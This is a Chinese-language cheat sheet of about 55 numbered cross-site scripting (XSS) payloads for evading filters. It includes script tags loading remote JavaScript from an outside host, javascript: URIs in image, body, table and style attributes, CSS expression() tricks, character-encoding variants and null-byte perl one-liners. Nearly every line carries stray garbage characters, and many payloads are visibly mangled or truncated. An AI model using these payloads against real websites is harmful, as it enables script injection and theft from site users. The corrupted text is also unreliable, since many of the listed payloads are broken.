(1)普通的XSS JavaScript注入0 |9 p- _+ g+ p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- z/ @, w* C; ~- F& C( F% ~(99)另类弹框
$ X) ?$ n! q+ F. B' C<q/oncut=alert()>1: F4 y, }" r; L
<s/onclick=alert()>b! @7 \9 b6 k7 I& W, q" j9 F
<XSS=" onclick="alert(1)//">clickme</SSX=">6 e) e5 R' c, x9 l
<zzz onclick=alert`1`>clickme</zzz>
4 i7 W* }" `/ a; A$ p <a onclick=alert`1`>clickme</a>
, f v; g$ `- O' a4 B. C<a=">clickme</a=">
$ ~: C. b, _* Z9 h<a=">clickme</a>$ A# X) I) a4 r4 U$ o9 X
<z=">clickme</z=">/ |) F; ~0 c* [: Y! a+ v$ V# W
<z onclick=alert`1`>clickme</z>
4 G/ O/ g. ^) `0 E
7 m# { L9 r# V% E+ E(2)IMG标签XSS使用JavaScript命令. r. Q0 y) V3 s5 o
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
H, l9 {5 |8 E8 Y1 P/ V
, X W" k: V& S# Y(3)IMG标签无分号无引号8 S4 }$ B7 _6 V- r7 N; o5 l
<IMG SRC=javascript:alert(‘XSS’)> e" G- a! C% n* d+ `0 C/ F
2 G: ~& [1 l( F8 u! B- u C(4)IMG标签大小写不敏感
" t% k: g# b' ]7 H/ d m! W: |# G<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ K& w K( L9 U! E8 T) u& x& J: Q; q& m* L& n- ?0 E h
(5)HTML编码(必须有分号)8 Y6 }# c- s( V, f
<IMG SRC=javascript:alert(“XSS”)>+ ~/ q3 }1 Z' ]+ F
% y% o6 x0 a! K# k1 p% v D(6)修正缺陷IMG标签, T+ y7 w x( ?& z1 m
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>4 Q2 [3 Z/ q, [
0 P9 I' Z- u# R3 ?$ [) V% z(7)formCharCode标签(计算器)8 d. X$ c D! S1 y. P* n: U
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 Y% l7 v! P, o$ Z! k2 \% y$ ]7 r1 r' b
' H3 I4 }1 F0 o' c(8)UTF-8的Unicode编码(计算器)
. K$ S) }2 i% }9 x: ~<IMG SRC=jav..省略..S')>/ G) c# L% m b# l- Z( T" v0 e) s
7 j1 S: q7 _$ b8 B3 V(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! b1 f' d" ^+ L<IMG SRC=jav..省略..S')>% o' B- F2 H& v& v& Y$ S
1 F/ u& C. P& d8 f+ O
(10)十六进制编码也是没有分号(计算器)
0 |. u {/ M; h! E5 }( c0 J& y. I<IMG SRC=\'#\'" /span>
0 X' B+ T* H% o- @" u# h/ B7 i4 Y y6 z( L; `
(11)嵌入式标签,将Javascript分开$ ]6 S$ {3 i9 Q3 q
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 m T' x9 O# y2 C
5 c i' W) g) X) U' R4 N(12)嵌入式编码标签,将Javascript分开; W% J! \4 \' U# m$ s" ]
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>% d5 M: v: t& v; F8 f9 b
! Y }. M4 G: ?- d(13)嵌入式换行符4 I$ T1 s0 f" t- q/ i, b" B
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ j. P& z3 l5 _8 L6 v+ [; l" `* e7 P/ C! ^* x6 s
(14)嵌入式回车% F4 r, z, j# K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>- `6 c3 |9 Q( K! |2 X2 H9 X
% P. p: K1 O/ ]+ b0 Y(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 s3 E9 E+ ]% Z H9 @
<IMG SRC=\'#\'" /span>
: e' X' a( n7 ~' W3 ]' A
. q1 N/ V9 m; X+ N/ c(16)解决限制字符(要求同页面)8 W, G1 _9 L; B Y
<script>z=’document.’</script>, x' o9 l5 I2 A. w6 k; s
<script>z=z+’write(“‘</script>
$ @- ?0 a/ n: n3 g<script>z=z+’<script’</script>
- F9 L, \/ N3 g+ g<script>z=z+’ src=ht’</script>
% n$ g y0 u0 H! ^% E I<script>z=z+’tp://ww’</script>* N+ V+ X! z9 p7 @8 f; C: i4 f* Y h
<script>z=z+’w.shell’</script>, R( ^5 d N+ j T/ |' V( E
<script>z=z+’.net/1.’</script># }( C' z( a) t& G# S
<script>z=z+’js></sc’</script>! g; a, f' A; j: F
<script>z=z+’ript>”)’</script>
* X& p3 N ~, w1 [$ T: P- f<script>eval_r(z)</script>
6 ^4 R7 m% S- i( e& P* w u, C! p: N5 c5 x
(17)空字符3 c& d# @5 C; E
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
! b9 Y. B7 L! V& @* L: q* ? A3 }/ L/ G9 |
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# y# ?! Y2 m) d3 g4 w7 v
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% ], |: k/ f: U/ W( d, `" u+ Y
8 e! _# b X- o( {/ ~(19)Spaces和meta前的IMG标签% ~; M& l- ]7 {( ^ T- F2 i
<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
! c5 K6 T5 O: \. k
* a0 E& k) t, v3 D4 N# G(20)Non-alpha-non-digit XSS
4 I& s; X5 D4 } C& s<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>4 ?* A: @/ a$ z6 F$ S# r
( M4 [4 Z7 S8 J; H- D1 r(21)Non-alpha-non-digit XSS to 2( A( _( |/ V' P
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 \3 P, e: A1 C
0 O7 j1 u2 D2 n5 z9 R; ^+ C
(22)Non-alpha-non-digit XSS to 3 j. K( {# i, f( s3 p2 ?+ V
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>; M1 `# m( j. l% f2 R) Z/ o9 T
0 g- Q) G6 U: i8 q(23)双开括号" D# S4 Q) ^4 L' `; l
<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 Y3 q8 E& U+ _9 i6 U: ~
# ~6 t7 X6 X; {(24)无结束脚本标记(仅火狐等浏览器)0 _5 V2 L3 l7 u5 q% n c6 k9 y- A+ F
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
6 v4 B, ]& s7 {. D' n1 o' t8 u" D+ T. u3 x7 O
(25)无结束脚本标记2
1 y1 u7 }9 y7 h) }3 r/ H/ ~<SCRIPT SRC=//3w.org/XSS/xss.js>' X4 A+ }" X7 |: w/ W
" l) z* C' ?8 Y& e0 v) p
(26)半开的HTML/JavaScript XSS7 b# s# r5 I; \& G, b
<IMG SRC=\'#\'" /span>- o% g7 x0 p* J+ t0 y' C
& ^* ` ~! w, }4 O! B(27)双开角括号
& ]$ S* F1 y. y, t; l% o, H# v<iframe src=http://3w.org/XSS.html </ [4 ?) B b' ?9 V" s, m
8 l7 K( v* [) O; T) w(28)无单引号 双引号 分号
" n2 K$ O9 O# ? W$ t<SCRIPT>a=/XSS/! J& Z6 G5 i1 K4 b3 @0 B/ X+ [" H
alert(a.source)</SCRIPT>' m; z' F# u; `$ E0 c p
/ g: p1 S) x D1 o2 C
(29)换码过滤的JavaScript
4 M1 k5 Q0 u) ~) z t- d% ~\”;alert(‘XSS’);//
( v( _3 ^: }- U. v5 ]" P# _( \4 ?* a% d% y+ M' ?
(30)结束Title标签, M2 A: \1 N9 ]# L& k' A. e+ s
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 v; E K. J' i4 E. q
4 U5 F$ o3 }& @- y+ V" l(31)Input Image1 v: Y8 T' a0 Q6 U6 u
<INPUT SRC=\'#\'" /span>" T" R; p, K5 J* ?
* [' i* `( V- J3 F4 Q(32)BODY Image
z% u7 |" [# z/ P" K<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 @2 \$ r8 X0 y
; `% k, g7 a: i6 w. {(33)BODY标签
( G# e3 }9 p7 |7 y. O& l<BODY(‘XSS’)>' Z1 `; H' c+ X7 w" W9 ~' u
: P% z! e3 q! q- U, h4 l(34)IMG Dynsrc
* ?& B" g4 w3 [! P- M) A4 r<IMG DYNSRC=\'#\'" /span>
% a9 s2 h- n& U! k/ T/ B% D7 G8 _2 M' h6 I
(35)IMG Lowsrc: E* ?# j1 h; ?
<IMG LOWSRC=\'#\'" /span>
) h! r4 L0 ~. h
3 A0 @7 J6 S5 B" u(36)BGSOUND- o- M3 x" U q' C( @
<BGSOUND SRC=\'#\'" /span>
( ]7 {5 L; T( B5 j$ c
* z0 T$ A7 E& [; B(37)STYLE sheet
2 H& ?# ~) a( [! v<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”># ~4 f( | A, j6 v
1 m6 O( h" `& |
(38)远程样式表: ~; r$ H$ }/ u' b+ |& C% h1 Q! X" O
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
5 ~9 a; d& e6 m2 D/ w# q+ z
" k9 {) V. L/ Q! h. B9 h2 E(39)List-style-image(列表式). p0 T4 ]7 L! j( L" U. |% {
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS+ {( h8 i: X" S/ K; d8 _
+ ^; f- T) i, M, I% z& n(40)IMG VBscript
: _- `+ ]0 A' R, D' O5 O; V5 a<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
) T4 |% |. _5 g/ p D8 [) s' \, x
# s6 f6 P/ e$ ~8 @(41)META链接url: A+ y# ^" I( m
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
5 d, M3 z; w! M5 M# ]8 J3 [
/ c5 @5 G$ _7 J0 e/ M(42)Iframe) T, F4 P( z: M# C, d
<IFRAME SRC=\'#\'" /IFRAME># D7 Y; F$ N2 h% r* D' w t e R3 v
. r- r O( d. F# J; Q
(43)Frame
! O# x9 q( p3 v" V<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>) L1 a9 j$ v# X2 p) |8 z; V
7 H" i: z0 _. e( Q, G5 P* G
(44)Table5 ?9 Y% |6 _* y; X" a
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, j, j* o2 G0 g7 Y6 l5 u7 [: Q
* L/ @) S+ Q& R* S
(45)TD
2 Z y. \7 I( z7 t, Q2 K<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% `8 K: d% j3 Y* J' ^# q; Z: I9 k
5 y! I; W" }+ B% p+ F(46)DIV background-image
, f2 G5 c( L+ G b<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! j2 F. s3 a& }/ |6 W
& [4 ]1 e, B0 s1 y1 f
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)1 N; \0 M0 A5 |
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
] \" s* m% G. z2 Y
* Y: x( T7 E8 g+ G* A% Q* [: W(48)DIV expression
H9 {3 t5 z4 q0 B<DIV STYLE=”width: expression_r(alert(‘XSS’));”>5 G) J+ Z g" }8 t* F6 T4 F0 a
+ o" J9 m# ~: u( [3 |
(49)STYLE属性分拆表达1 }; E! \) F* O# l5 z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( P2 U# H: N4 M* A" ^
$ H) Z* S- T9 b9 J5 C(50)匿名STYLE(组成:开角号和一个字母开头)+ S9 H7 M2 ?- H( `
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& ~. [1 ~7 f4 V: ?4 ~) x
9 N3 C: i/ |6 X2 H
(51)STYLE background-image: d) I) ^- w3 G4 b
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
0 i2 a" { s- l2 t6 k
3 g f6 Z" v3 u% w& T0 P& l* T(52)IMG STYLE方式; h; u0 _8 T5 U. f# A1 s/ n/ z
exppression(alert(“XSS”))’>1 q/ A2 u$ Z' y( T7 c: p! ^
* P/ G4 h* @4 y- f(53)STYLE background
+ N: p" T* j$ X. q0 i# J<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 x, G$ @0 p- U. @. g: ^' s2 B9 f$ H
! ]$ t- J; ~( C1 x* u3 N/ g(54)BASE8 q/ L: w, {; t A3 M% y
<BASE HREF=”javascript:alert(‘XSS’);//”>) Z8 _5 r' |) D( u
" w# a. E2 @9 K% t `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" z+ x5 a3 V6 f* M5 [<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
4 v2 W/ M9 C/ x# u7 x |